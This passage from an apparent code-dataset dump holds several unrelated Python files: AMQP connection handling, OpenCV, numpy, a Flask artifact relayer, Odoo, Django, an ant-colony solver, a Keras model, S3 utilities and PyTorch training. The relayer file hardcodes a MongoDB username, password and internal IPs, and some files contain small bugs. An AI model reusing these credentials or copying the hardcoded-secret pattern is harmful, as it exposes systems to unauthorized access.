self._heartbeat = HeartbeatSender(self)\n # handshake\n self._main_loop = ThreadConnectionMainLoop(self)\n self._main_loop.start()\n self._handshake()\n\n # start heartbeat\n self._heartbeat.setHeartbeat(self.heartbeat)\n self._heartbeat.start()\n\n def _handshake(self):\n connection_start = self.rpc0(self.channel_number0, frame.ProtocolHeader(), [spec.Connection.Start])\n self.server_properties = connection_start.server_properties\n self.publisher_confirms = self.server_properties['capabilities']['publisher_confirms']\n self.basic_nack = self.server_properties['capabilities']['basic.nack']\n (auth_type, response) = self.parameters.credentials.response_for(connection_start)\n tune = self.rpc0(self.channel_number0, spec.Connection.StartOk(self.client_properties, auth_type, response,\n self.parameters.locale), [spec.Connection.Tune])\n self.channel_max = tune.channel_max or self.parameters.channel_max\n self.frame_max = tune.frame_max or self.parameters.frame_max\n self.heartbeat = min(tune.heartbeat, self.parameters.heartbeat)\n\n self.send_method(self.channel_number0, spec.Connection.TuneOk(self.channel_max, self.frame_max,\n self.heartbeat))\n self.rpc0(self.channel_number0, spec.Connection.Open(self.parameters.virtual_host, '', False),\n [spec.Connection.OpenOk])\n\n def channel(self, channel_number=None):\n if channel_number is None:\n channel_number = self._next_channel_number()\n self.channels[channel_number] = ThreadConnectionChannel(self, channel_number)\n self.channels[channel_number].open()\n return self.channels[channel_number]\n\n def deliver_pub_ack(self, frame_value):\n if frame_value.channel_number not in self.channels:\n LOGGER.critical(\"Received %s frame for unregistered channel %i on %s\", frame_value.NAME,\n frame_value.channel_number, self)\n return\n 
self.channels[frame_value.channel_number].handle_pub_ack(frame_value)\n\n def deliver_frame(self, frame_value):\n if frame_value.channel_number == 0:\n self.handle_frame(frame_value)\n return\n if frame_value.channel_number not in self.channels:\n LOGGER.critical(\"Received %s frame for unregistered channel %i on %s\", frame_value.NAME,\n frame_value.channel_number, self)\n return\n self.channels[frame_value.channel_number].handle_frame(frame_value)\n\n def read_frame(self):\n if self.is_closed():\n LOGGER.error(\"Attempted to read frame when closed\")\n return self._transport.read_frame()\n\n def send_method(self, channel_number, method):\n if isinstance(method, frame.ProtocolHeader):\n self.send_frame(method)\n else:\n self.send_frame(frame.Method(channel_number, method))\n\n def send_frame(self, frame_value):\n if self.is_closed():\n LOGGER.error(\"Attempted to send frame when closed\")\n raise exceptions.ConnectionClosed\n\n marshaled_frame = frame_value.marshal()\n self._transport.write(marshaled_frame)\n self._heartbeat.signal_activity()\n\n def is_closed(self):\n return not self._transport.connected\n\n def _try_connect(self):\n remaining_connection_attempts = self.parameters.connection_attempts\n while True:\n try:\n self._transport.connect()\n return\n except socket.error:\n if remaining_connection_attempts <= 0:\n raise\n else:\n LOGGER.info(\"Retrying in %i seconds\", self.parameters.retry_delay)\n remaining_connection_attempts -= 1\n\n def _next_channel_number(self):\n if len(self.channels) >= self.channel_max:\n raise exceptions.NoFreeChannels()\n\n for num in xrange(1, len(self.channels) + 1):\n if num not in self.channels:\n return num\n return len(self.channels) + 1\n","sub_path":"pika/adapters/thread_connection.py","file_name":"thread_connection.py","file_ext":"py","file_size_in_byte":7874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"568931556","text":"import numpy as np\r\nimport cv2\r\ncap = cv2.VideoCapture(0)\r\n \r\n# Define the codec and create VideoWriter object\r\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\r\nout = cv2.VideoWriter('output.avi',fourcc, 20.0, (640,480))\r\ncount=0 \r\nwhile(cap.isOpened()):\r\n ret, frame = cap.read()\r\n if ret==True:\r\n# flip the frame vertically (flip code 0 = around the x-axis)\r\n frame = cv2.flip(frame,0)\r\n# save the current frame as a numbered JPEG\r\n cv2.imwrite(\"frame%d.jpg\" % count, frame) # save frame as JPEG file\r\n count += 1 # advance the index so each frame gets a unique file name\r\n# write the flipped frame\r\n out.write(frame)\r\n \r\n cv2.imshow('frame',frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n else:\r\n break\r\n \r\n# Release everything if job is finished\r\ncap.release()\r\nout.release()\r\ncv2.destroyAllWindows()\r\n","sub_path":"VideoFlipVertical.py","file_name":"VideoFlipVertical.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"197009036","text":"import numpy as np \nimport matplotlib.pyplot as plt\n'''\nmat1 = np.zeros((3,4,5))\nprint(mat1)\nprint(mat1.ndim)\nprint(mat1.shape)\nprint()\n\nmat2 = np.ones((3,3)) *2\n'''\n'''\nmat2_2 = mat2*2\nmat2_3 = mat2 * mat2_2 # element-wise product, unlike linear-algebra matrix multiplication\nmat2_4 = np.matmul(mat2,mat2_2) # linear-algebra matrix multiplication\n\nprint(mat2)\nprint(mat2_2)\nprint(mat2_3)\nprint(mat2_4)\nprint()\n'''\n'''\nmat3 = np.eye(3,3)\nprint(mat2)\nprint(mat3)\nprint(mat2*mat3)\nprint(np.matmul(mat2,mat3))\nprint()\n'''\narr_x = np.arange(10)\na = np.random.rand(10) # uniform in [0, 1]\nb = np.random.randint(0, 10, 10) # 
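
For reference, cv2.flip's flip code selects the axis, which is easy to confuse with rotation; a quick sketch, with the image path as a placeholder:

    import cv2

    img = cv2.imread("frame0.jpg")  # placeholder path
    if img is not None:
        vertical = cv2.flip(img, 0)    # around the x-axis, as in the loop above
        horizontal = cv2.flip(img, 1)  # around the y-axis
        both = cv2.flip(img, -1)       # around both axes
        quarter = cv2.rotate(img, cv2.ROTATE_90_CLOCKWISE)  # a true 90-degree turn
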
uniform in [0, 10) with 10 elements\nprint(a)\nprint(b)\nplt.plot(arr_x,a,'-r^',arr_x,b,'--go')\nplt.show()\n","sub_path":"13_numpy/numpy_generais.py","file_name":"numpy_generais.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"635462954","text":"import logging\nimport os\nimport re\nimport socket\nimport sqlite3\nimport threading\nfrom BaseHTTPServer import HTTPServer\n\nimport requests\nfrom flask import request, Flask, g, jsonify\nfrom prometheus_client import Counter, MetricsHandler\nfrom pymongo import MongoClient\nfrom requests import ConnectionError, exceptions\n\nimport Download\n\napp = Flask(__name__)\n\n# MONGO_HOST = \"localhost\"\n# MONGO_PORT = 27017\nMONGO_HOST = \"10.85.186.177\"\nMONGO_PORT = 27101\nMONGO_DBNAME = \"counter\"\nMONGO_USER = \"rw_art\"\nMONGO_PASS = \"mxjG3E_q\"\n\nclient = MongoClient(MONGO_HOST, MONGO_PORT)\n# client = MongoClient(\"mongodb://\"+MONGO_HOST+\":27101\")\ndb = client['counter']\n\n# app.config.from_pyfile('config.py', silent=False)\n\napp.config.update(dict(\n DATABASE=os.path.join(app.root_path, 'relayer.db'),\n PROMETHEUS_PORT=8000\n))\n\nrelay_mapping = {}\n# logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n\ntotal = Counter('total', 'total requests')\nsuccess_counter = Counter('Success', 'requests successful')\n\n\nclass PrometheusEndpointServer(threading.Thread):\n \"\"\"A thread class that holds an http and makes it serve_forever().\"\"\"\n\n def __init__(self, httpd, *args, **kwargs):\n self.httpd = httpd\n super(PrometheusEndpointServer, self).__init__(*args, **kwargs)\n\n def run(self):\n self.httpd.serve_forever()\n\n\ndef start_prometheus_server():\n try:\n httpd = HTTPServer((\"0.0.0.0\", app.config['PROMETHEUS_PORT']), MetricsHandler)\n logging.info(\"prometheus started\")\n except (OSError, socket.error):\n return\n\n thread = PrometheusEndpointServer(httpd)\n thread.daemon = True\n thread.start()\n\n\nstart_prometheus_server()\n\n\ndef connect_db():\n conn = sqlite3.connect(app.config['DATABASE'])\n conn.row_factory = sqlite3.Row\n return conn;\n\n\ndef init_db():\n db = get_db()\n with app.open_resource('schema.sql', 'r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\ndef get_db():\n if not hasattr(g, 'sqlite_db'):\n g.sqlite_db = connect_db()\n return g.sqlite_db\n\n\n@app.cli.command('initdb')\ndef init_db_command():\n init_db()\n logging.info(\"DB initialized\")\n\n\n@app.context_processor\ndef app_start():\n init_db()\n app.logger.info(\"DB started\")\n\n\n@app.teardown_appcontext\ndef close_db(error):\n if hasattr(g, 'sqlite_db'):\n g.sqlite_db.close()\n\n\ndef get_new_path(old_path):\n path_list = old_path.split(\"/\")[2:]\n new_path = \"\"\n for i in path_list:\n new_path = new_path + \"/\" + i\n new_path = \"/artifactory/v1.0/artifacts/libs-release-local\" + new_path\n return new_path\n\n\ndef create_request(path):\n path_list = path.split(\"/\")\n artifact_name = path_list[len(path_list)]\n\n\n# @app.route('/', defaults={'path': ''}, methods=['GET'])\n@app.route('/', methods=['GET', 'HEAD', 'POST'])\ndef relay(path):\n \"\"\" POST/GET method handler\n POST call is relayed in accordance with relay_mapping global dict object\n GET call is more of a debug call, relayed to all the URLs\n \"\"\"\n\n total.inc(1)\n elb = \"http://10.85.59.116\"\n\n app.logger.info(\"Path received from artifactory: {}\".format(path))\n\n new_path = get_new_path(path)\n # # for artPath 
in path.split(\"/\")[2:]:\n # # artPath=\n #\n # old_path = path\n # new_path = re.sub(r'libs-(snapshot(s?)|release(s?))(-(local))*', \"v1.0/artifacts/libs-release-local\", path)\n app.logger.info(\"Sending request to: {} \".format(elb + new_path))\n\n ret_tup = (\"Bad Request\", 400)\n if request.method == 'GET' and \"artifactory\" in path:\n\n try:\n res = requests.get(elb + new_path, timeout=2)\n except ConnectionError as e:\n app.logger.error(\"Error {} connecting to ELB {}: \".format(e.message, elb))\n raise exceptions.ConnectionError\n\n db.counter.insert(\n {\"old_path\": path, \"new_path\": new_path, \"status_code\": res.status_code, \"http_method\": request.method})\n if res.status_code != 200:\n app.logger.error(\"artifact not found for path: {}\".format(new_path))\n response = {\"Artifact Not found for path\": new_path}\n\n return jsonify(response), res.status_code\n\n else:\n success_counter.inc()\n app.logger.info(\"Artifact found for path: {}\".format(path))\n ret_tup = (\"Artifact Found\", 200)\n elif request.method == 'HEAD' and \"artifactory\" in path:\n try:\n res = requests.head(elb + new_path, timeout=2)\n except ConnectionError as e:\n app.logger.error(\"Error {} connecting to ELB {}: \".format(e.message, elb))\n raise exceptions.ConnectionError\n\n db.counter.insert(\n {\"old_path\": path, \"new_path\": new_path, \"status_code\": res.status_code, \"http_method\": request.method})\n if res.status_code != 200:\n app.logger.error(\"artifact not found for path: {}\".format(new_path))\n response = {\"Artifact Not found for path\": new_path}\n\n return jsonify(response), res.status_code\n\n else:\n success_counter.inc()\n app.logger.info(\"Artifact found for path: {}\".format(path))\n ret_tup = (\"Artifact Found\", 200)\n\n elif request.method == 'POST' and 'artifactory' in path:\n db.counter.insert({'http_method': request.method, \"old_path\": path})\n else:\n app.logger.error(\"method type {} not handled\".format(request.method))\n\n return ret_tup\n\n\ndef failed_count():\n regex = re.compile('^((?!maven-metadata).)*$', re.IGNORECASE)\n req_failed = db.counter.find({'$and': [{\"old_path\": regex}, {\"status_code\": 404}]})\n result = db.counter.find({\"status_code\": 404})\n result_set = set()\n for entry in result:\n # print entry\n temp_arr = entry['old_path'].split(\"/\")[2:]\n path = ''\n for a in temp_arr:\n path = path + \"/\" + a\n if \".sha1\" not in path and 'maven-metadata' not in path and '.md5' not in path:\n result_set.add(path)\n # for a in result_set:\n # print a\n # print result.count(), len(result_set)\n return len(result_set)\n\n\n@app.route('/stats', methods=['GET'])\ndef stats():\n regex = re.compile('^((?!maven-metadata).)*$', re.IGNORECASE)\n # maven_meta = db.counter.find({\"old_path\":regex}).count()\n\n tot_num_of_requests = db.counter.find({'$and': [{\"old_path\": regex}, {\"http_method\": \"GET\"}]}).count()\n\n # tot_num_of_requests = db.counter.find({\"http_method\": \"GET\"}).count()\n\n # req_failed = db.counter.find({\"status_code\": 404}).count()\n # req_success = db.counter.find({\"status_code\": 200}).count()\n # req_redirected = db.counter.find({\"status_code\": 307}).count()\n # req_upload = db.counter.find({\"http_method\": 'POST'}).count()\n\n # req_failed = db.counter.find({'$and': [{\"old_path\": regex}, {\"status_code\": 404}]}).count()\n req_failed = failed_count()\n req_success = db.counter.find({'$and': [{\"old_path\": regex}, {\"status_code\": 200}]}).count()\n req_redirected = db.counter.find({'$and': [{\"old_path\": regex}, 
{\"status_code\": 307}]}).count()\n req_upload = db.counter.find({'$and': [{\"old_path\": regex}, {\"http_method\": \"POST\"}]}).count()\n\n response = {\"Total\": tot_num_of_requests, \"Success\": req_success, \"Failed\": req_failed,\n \"Requests_redirected\": req_redirected, \"Upload Requests\": req_upload}\n return jsonify(response)\n\n\nif __name__ == \"__main__\":\n # start_http_server(8000)\n # start_wsgi_server(app.config['PROMETHEUS_PORT'], addr='172.20.97.183')\n # db.create_all()\n # app.run(host='172.20.97.183', port=5000)\n # app.run(host=\"172.20.148.92\",port=5000)\n app.run()\n","sub_path":"artifactory/scripts/Relayer/relayer/relayer.py","file_name":"relayer.py","file_ext":"py","file_size_in_byte":7669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"439130751","text":"import time\nfrom datetime import datetime, timedelta\nfrom dateutil import relativedelta\n\nfrom odoo import api, fields, models, tools, _\nfrom odoo.exceptions import UserError, ValidationError\n\n\nclass VrPayslipBatches(models.Model):\n\t_name = \"hr.afg.payroll.batches\"\n\n\n\tname = fields.Char(required=True, readonly=True, states={'draft': [('readonly', False)]})\n\tslip_ids = fields.One2many('hr.afg.payroll', 'payslip_run_id', string='Payslips', readonly=True,\n\t\tstates={'draft': [('readonly', False)]})\n\tstate = fields.Selection([\n\t\t('draft', 'Draft'),\n\t\t('close', 'Close'),\n\t\t('done', 'Done'),\n\t\t], string='Status', index=True, readonly=True, copy=False, default='draft')\n\tdate_start = fields.Date(string='Date From', required=True, readonly=True,\n\t\tstates={'draft': [('readonly', False)]}, default=time.strftime('%Y-%m-01'))\n\tdate_end = fields.Date(string='Date To', required=True, readonly=True,\n\t\tstates={'draft': [('readonly', False)]},\n\t\tdefault=str(datetime.now() + relativedelta.relativedelta(months=+1, day=1, days=-1))[:10])\n\tcredit_note = fields.Boolean(string='Credit Note', readonly=True,\n\t\tstates={'draft': [('readonly', False)]},\n\t\thelp=\"If its checked, indicates that all payslips generated from here are refund payslips.\")\n","sub_path":"afg_payroll/models/payslip_batches.py","file_name":"payslip_batches.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"484345239","text":"from django.contrib import admin\r\nfrom .models import Client_Task\r\n\r\n# Register your models here.\r\n\r\nclass MainAdmin(admin.ModelAdmin):\r\n\tlist_display = (\r\n\t'veh_model',\r\n\t'veh_type',\r\n\t'veh_state',\r\n\t'tariff',\r\n\t'budget',\r\n\t'add_date',\r\n\t)\r\n\r\nadmin.site.register(Client_Task, MainAdmin)\r\n","sub_path":"apps/greenhub_auction/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"648230416","text":"from city import *\nfrom random import randint\nfrom math import sqrt\n\nclass ant:\n\n def __init__(self, city):\n self.city = city\n self.pos = city.position\n self.visited = [city]\n self.distance = 0\n self.dis_next_position = 0\n self.counter = 0\n\n##boulean pour tester si on a passe la ville\n def path_visited(self, path):\n pos = path[\"position\"]\n for i in self.visited:\n if pos == i.position:\n return True\n return False\n##la distance pour aller à la prochine ville\n##trouver la prochaine ville qu'on va y aller\n def next_position(self):\n def distance(p1, p2):\n return 
sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)\n        possible_citys = []\n        for i in self.city.path:\n            if not self.path_visited(i):\n                possible_citys.append(i)\n\n        sum_info = 0\n        dart = []\n\n        for i in possible_citys:\n            sum_info += i[\"info\"]\n            dart.append(sum_info)\n        sum_info = int(sum_info)\n\n        rand = randint(0, sum_info)\n        for i in range(len(dart)):\n            if rand <= dart[i]:\n                pos = possible_citys[i][\"position\"]\n                break\n        for i in self.city.path:\n            if i[\"position\"] == pos:\n                i[\"info\"] += INFO / i[\"distance\"]\n        tmp = self.pos\n        self.pos = pos\n        self.distance += distance(tmp, pos)\n        self.dis_next_position = distance(tmp, pos)\n        #print(pos)\n\n## total length traveled by one ant\n    def calcule_distance(self):\n        def distance(p1, p2):\n            return sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)\n        res = 0\n        for i in range(len(self.visited) - 1):\n            res += distance(self.visited[i - 1].position, self.visited[i].position)\n        return res\n\n\n\n\n\n","sub_path":"python/TSP/ant.py","file_name":"ant.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"233197501","text":"import os, pathlib\n\nimport dummy_data_generator\nimport feature_extractors\nimport scoring\n\nimport numpy as np\nimport random\n\nimport tensorflow as tf\nfrom tensorflow import keras \nK = keras.backend\n\nLATENT_DIM = 128\n\ndef _build_model(constants):\n    encoder_inputs = keras.Input(shape=(constants['MAX_SEQ_LEN'], constants['X_DIM']))\n\n    masking_layer = keras.layers.Masking(mask_value=constants['MASK_VALUE'])\n    masked_inputs = masking_layer(encoder_inputs)\n    \n    encoder = keras.layers.LSTM(LATENT_DIM, return_state=True)\n    _, state_h, state_c = encoder(masked_inputs)\n    encoder_states = [state_h, state_c]\n\n    decoder_inputs = keras.Input(shape=(constants['MAX_SEQ_LEN'], constants['Y_DIM']))\n\n    decoder_lstm = keras.layers.LSTM(LATENT_DIM, return_sequences=True, return_state=True)\n    decoder_dense = keras.layers.Dense(constants['Y_DIM'], activation=None)\n\n    decoder_outputs, _, _ = decoder_lstm(decoder_inputs,\n                                         initial_state=encoder_states)\n    # decoder_outputs, _, _ = decoder_lstm(decoder_inputs)\n    decoder_outputs = decoder_dense(decoder_outputs)\n    #decoder_outputs = tf.compat.v1.Print(decoder_outputs, [decoder_outputs], summarize=100)\n\n\n    m = keras.Model([encoder_inputs, decoder_inputs], decoder_outputs)\n    return m\n\ndef train():\n    train_data, test_data, constants = feature_extractors.load_dataset()\n    encoder_input_data, decoder_input_data, decoder_target_data = train_data\n    model = _build_model(constants)\n\n    l = keras.losses.MeanSquaredError()\n    o = keras.optimizers.Adam(learning_rate=0.005)\n    model.compile(optimizer=o, loss=l)\n    model.fit([encoder_input_data, decoder_input_data], decoder_target_data,\n              batch_size=32,\n              epochs=100,\n              validation_split=0.05)\n    model.save('chorale_model_128')\n\ndef predict():\n    train_data, test_data, constants = feature_extractors.load_dataset()\n    encoder_input_data, decoder_input_data, decoder_target_data = test_data\n\n    model = keras.models.load_model('chorale_model_128')\n    \n    # Extract encoder from graph\n    encoder_inputs = model.input[0]\n    _, state_h_enc, state_c_enc = model.layers[3].output  # lstm_1\n    encoder_states = [state_h_enc, state_c_enc]\n    encoder_model = keras.Model(encoder_inputs, encoder_states)\n\n    # Extract decoder from graph\n    decoder_inputs = model.input[1]\n    decoder_state_input_h = keras.Input(shape=(LATENT_DIM,), name=\"input_3\")\n    decoder_state_input_c = keras.Input(shape=(LATENT_DIM,), 
name=\"input_4\")\n decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]\n\n decoder_lstm = model.layers[-2]\n decoder_dense = model.layers[-1]\n\n decoder_outputs, state_h_dec, state_c_dec = decoder_lstm(\n decoder_inputs, initial_state=decoder_states_inputs\n )\n decoder_states = [state_h_dec, state_c_dec]\n decoder_outputs = decoder_dense(decoder_outputs)\n decoder_model = keras.Model(\n [decoder_inputs] + decoder_states_inputs,\n [decoder_outputs] + decoder_states\n )\n\n def _terminate(toks):\n return np.isclose(np.mean(-1 - toks), 0.0, atol=0.5)\n \n def decode(input_seq):\n states_value = encoder_model.predict(np.array([input_seq]))\n target_seq = np.ones((1, 1, constants['Y_DIM'])) * -1.\n\n result = []\n stop = False\n for _ in range(100):\n output_tokens, h, c = decoder_model.predict(\n [target_seq] + states_value)\n if _terminate(output_tokens):\n return result\n result.append(output_tokens)\n\n target_seq = np.ones((1, 1, constants['Y_DIM'])) * output_tokens\n states_value = [h, c]\n print(\"Decoding did not terminate! Returning large RNA.\")\n return result\n\n def cut_off_ground_truth(ground_truth):\n res = []\n for g in ground_truth:\n if _terminate(g):\n return res\n res.append(g)\n print(\"Ground truth does not terminate! Returning large RNA.\")\n\n\n err_rates = []\n len_diffs = []\n for chorale_ind in range(len(encoder_input_data))[:15]:\n print(\"Eval for chorale \" + str(chorale_ind))\n decoded = decode(encoder_input_data[chorale_ind])\n decoded_rna_chords = [feature_extractors.RNAChord(encoding=decoded[i][0][0]) for i in range(len(decoded))]\n\n ground_truth = cut_off_ground_truth(decoder_target_data[chorale_ind])\n ground_truth_chords = [feature_extractors.RNAChord(encoding=ground_truth[i]) for i in range(len(ground_truth))]\n\n errs = scoring.levenshtein(ground_truth_chords, decoded_rna_chords, equality_fn=scoring.EQUALITY_FNS['key_enharmonic'])\n print(len(ground_truth_chords) - len(decoded_rna_chords))\n len_diffs.append(len(ground_truth_chords) - len(decoded_rna_chords))\n err_rates.append(float(errs / len(ground_truth_chords)))\n print(\"Error rate: \" + str(np.mean(err_rates)))\n print(\"Len diff: \" + str(np.mean(len_diffs)))\n # for c in ground_truth_chords:\n # print(c)\n # print(\"-----------------------------------------------------\")\n # for c in decoded_rna_chords:\n # print(c)\n\n\n\n\n#train()\npredict()","sub_path":"code/seq2seq_model.py","file_name":"seq2seq_model.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"29161510","text":"import asyncio\nimport socket\nimport unittest\n\nfrom functools import wraps\n\n\ndef run_until_complete(fun):\n if not asyncio.iscoroutinefunction(fun):\n fun = asyncio.coroutine(fun)\n\n @wraps(fun)\n def wrapper(test, *args, **kw):\n loop = test.loop\n ret = loop.run_until_complete(\n asyncio.wait_for(fun(test, *args, **kw), 15, loop=loop))\n return ret\n return wrapper\n\n\ndef find_unused_port():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind(('127.0.0.1', 0))\n port = s.getsockname()[1]\n s.close()\n return port\n\n\nclass BaseTest(unittest.TestCase):\n \"\"\"Base test case for unittests.\n \"\"\"\n def setUp(self):\n self.loop = asyncio.new_event_loop()\n asyncio.set_event_loop(None)\n self.port = find_unused_port()\n self.url = \"http://127.0.0.1:{}\".format(self.port)\n\n def tearDown(self):\n self.loop.close()\n del 
self.loop\n","sub_path":"tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551169059","text":"import boto3\nimport botocore.exceptions\nimport sys\n\n#bucket actions and features\n\ns3session = boto3.Session(profile_name='s3operator')\ns3client = s3session.resource('s3')\n\n\ndef list_buckets():\n '''list all bucket name within the session'''\n print('buckets:\\n\\t', *[b.name for b in s3client.buckets.all()], sep='\\n\\t')\n\ndef create_delete_bucket(bucket_name, isdelete):\n list_buckets()\n try:\n print('\\ncreating the new bucket: ', bucket_name)\n bucket = s3client.create_bucket(Bucket=bucket_name)\n\n except botocore.exceptions.ClientError as e:\n print('AWS ClientError:', e)\n sys.exit('Exit due to the failure of bucket creation.')\n\n bucket.wait_until_exists()\n list_buckets()\n\n if isdelete:\n print('\\n deleting the bucket: ', bucket_name)\n bucket.delete()\n bucket.wait_until_not_exists()\n list_buckets()\n else:\n print('\\ncreated the bucket: ', bucket_name)\n\n\ndef list_bucket_content(bucket_name, prefix='', filter_key=''):\n '''list all keys fit filter_key in the buckets\n eg. look for png file in the pictures folder, prefix='pictures'\n filter_key='.png' '''\n try:\n bucket = s3client.Bucket(bucket_name)\n if bool(prefix):\n bucket_objects = bucket.objects.filter(Prefix=prefix)\n else:\n bucket_objects = bucket.objects.all()\n\n for bo in bucket_objects:\n if filter_key in bo.key:\n print(bo.key)\n\n except botocore.exceptions.ClientError as e:\n print('AWS ClientError at list bucket content:', e)\n\n\ndef delete_files_in_bucket(bucket_name, prefix, inclusive='', exclusive=''):\n '''delete a set of files defined by prefix, inclusive, exclusive\n in a bucket by two api calls: one get the list of files, the other to call delete'''\n try:\n # get a list of files to be deleted\n bucket =s3client.Bucket(bucket_name)\n object_list = list()\n one_object =dict()\n for bo in bucket.objects.filter(Prefix=prefix):\n if (inclusive in bo.key) and not ( exclusive in bo.key):\n one_object['Key'] = bo.key\n object_list.append(one_object)\n one_object =dict()\n\n delete_objects=dict()\n delete_objects['Objects'] = object_list\n\n # one api call to delete all files in the list\n # and parse the response to check if it is deleted or not\n delete_resp = bucket.delete_objects(Delete=delete_objects)\n for d in delete_resp['Deleted']:\n print('The file {0} is deleted? 
{1}.'.format(d['Key'], d['DeleteMarker']))\n\n '''\n #check the content\n for k,v in delete_objects.items():\n print(f'delete_objects key:{k}')\n for one_item in v:\n print(one_item['Key'])\n '''\n\n except botocore.exceptions.ClientError as e:\n print(f'AWS Client error in delete_bucket_files: {e}')\n\n\n\nif __name__ == '__main__':\n delete_files_in_bucket('philadelphiasixers', prefix='sixers2020-08', inclusive='2020-08-19')\n #delete_files_in_bucket('philadelphiasixers', prefix='sixers', inclusive='2020-03-03-12', exclusive='-33-')\n #create_delete_bucket('zhijianchenbucketxyx666', False)\n #list_bucket_content('phillybucketlist', 'pictures', '.pdf')\n #list_bucket_content('philadelphiasixers', prefix='sixers')\n","sub_path":"s3/bucket_operator.py","file_name":"bucket_operator.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"600388105","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright (C) 2012 Yahoo! Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom pkg_resources import Requirement\n\nfrom anvil import shell as sh\n\nFREEZE_CMD = ['freeze', '--local']\n\n# Cache of whats installed - 'uncached' as needed\n_installed_cache = None\n\n\ndef uncache():\n global _installed_cache\n _installed_cache = None\n\n\ndef _list_installed(pip_how):\n cmd = [pip_how] + FREEZE_CMD\n (stdout, _stderr) = sh.execute(*cmd)\n installed = []\n for line in stdout.splitlines():\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n # Don't take editables either...\n if line.startswith('-e'):\n continue\n # We need to adjust the == that freeze produces\n # to instead have <= so that later when we ask\n # if a version matches it will say yes it does and\n # not just for exactly the same version\n if line.find('==') != -1:\n line = line.replace('==', '<=')\n try:\n installed.append(Requirement.parse(line))\n except ValueError:\n pass\n return installed\n\n\ndef _whats_installed(pip_how):\n global _installed_cache\n if _installed_cache is None:\n _installed_cache = _list_installed(pip_how)\n return _installed_cache\n\n\ndef is_installed(pip_how, name, version=None):\n if get_installed(pip_how, name, version):\n return True\n return False\n\n\ndef get_installed(pip_how, name, version=None):\n name_lc = name.lower()\n whats_there = _whats_installed(pip_how)\n for req in whats_there:\n if not (name_lc == req.key):\n continue\n if not version:\n return req\n if version in req:\n return req\n return None\n","sub_path":"anvil/packaging/helpers/pip_helper.py","file_name":"pip_helper.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"583463687","text":"import numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.functional as F\nfrom torch.autograd import Variable\n\nfrom tqdm import tqdm\n\ndevice = torch.device(\"cuda\" 
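
The == to <= rewrite in the pip helper above works because pkg_resources.Requirement supports version containment; a short demonstration:

    from pkg_resources import Requirement

    req = Requirement.parse("requests<=2.25")
    print(req.key)        # 'requests'
    print("2.20" in req)  # True: at or below the frozen version
    print("2.31" in req)  # False
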
if torch.cuda.is_available() else \"cpu\")\ntorch.set_default_dtype(torch.float64)\n\n\ndef train_simplenet(model, dataset, optimizer, nepochs, batch_size):\n    criterion = nn.MSELoss()\n    \n    pbar = tqdm(range(nepochs))\n\n    x_train, y_train, x_test, y_test = dataset\n    ndatapoints = len(x_train)\n\n    for epoch in pbar:\n        indices = np.random.randint(0, ndatapoints, batch_size)\n        x_batch = x_train[indices]\n        y_batch = y_train[indices]\n\n        X = Variable(torch.from_numpy(x_batch)).to(device)\n        Y = Variable(torch.from_numpy(y_batch)).to(device)\n\n        y_pred = model(X)\n        loss = criterion(y_pred, Y)\n        optimizer.zero_grad()\n        loss.backward()\n        optimizer.step()\n\n        if epoch % 20 == 0: \n            with torch.no_grad():\n                X = Variable(torch.from_numpy(x_test)).to(device)\n                Y = Variable(torch.from_numpy(y_test)).to(device)\n\n                y_pred = model(X)\n                loss = criterion(y_pred, Y).mean()\n    \n            pbar.set_description(f\"Epoch {epoch}; Loss {np.round(loss.item(), 5)}\")\n\n\ndef evaluate_simplenet(model, dataset):\n    criterion = nn.MSELoss()\n    with torch.no_grad():\n        _, _, x_test, y_test = dataset\n        X = Variable(torch.from_numpy(x_test)).to(device)\n        Y = Variable(torch.from_numpy(y_test)).to(device)\n\n        y_pred = model(X)\n        loss = criterion(y_pred, Y).mean()\n\n    return loss.item()","sub_path":"train_nn/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"319042862","text":"import time\nimport 